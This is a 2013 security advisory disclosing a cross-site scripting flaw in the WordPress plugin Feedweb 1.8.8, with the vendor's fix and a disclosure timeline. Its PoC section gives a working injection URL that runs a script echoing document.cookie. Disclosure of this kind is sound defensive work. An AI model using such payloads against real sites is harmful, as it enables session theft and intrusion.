WordPress Plugin 'Feedweb 1.8.8' Cross-site Scripting vulnerability

Advisory:		WordPress Plugin 'Feedweb 1.8.8' Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2013-004
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Feedweb 1.8.8
Vendor URL:		http://wordpress.org/extend/plugins/feedweb/
Vendor Status:		fixed
CVE-ID: 		Requested

==========================
Vulnerability Description
==========================

The WordPress plugin Feedweb 1.8.8 is prone to a XSS vulnerability

==============
PoC-Exploit
==============

// with authenticated admin user

http://[target]/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=</script><script>alert(document.cookie)</script>

=====
Solution
=====

Update to the latest version 1.9

================
Disclosure Timeline
================

30-Mar-2013 - informed plugins@wordpress.org
01-Apr-2013 - fixed by developer

====
Credits
====

Vulnerability found and advisory written by Stefan Schurtz.

=======
References
=======
 
http://wordpress.org/extend/plugins/feedweb/changelog/
http://www.darksecurity.de/advisories/2013/SSCHADV2013-004.txt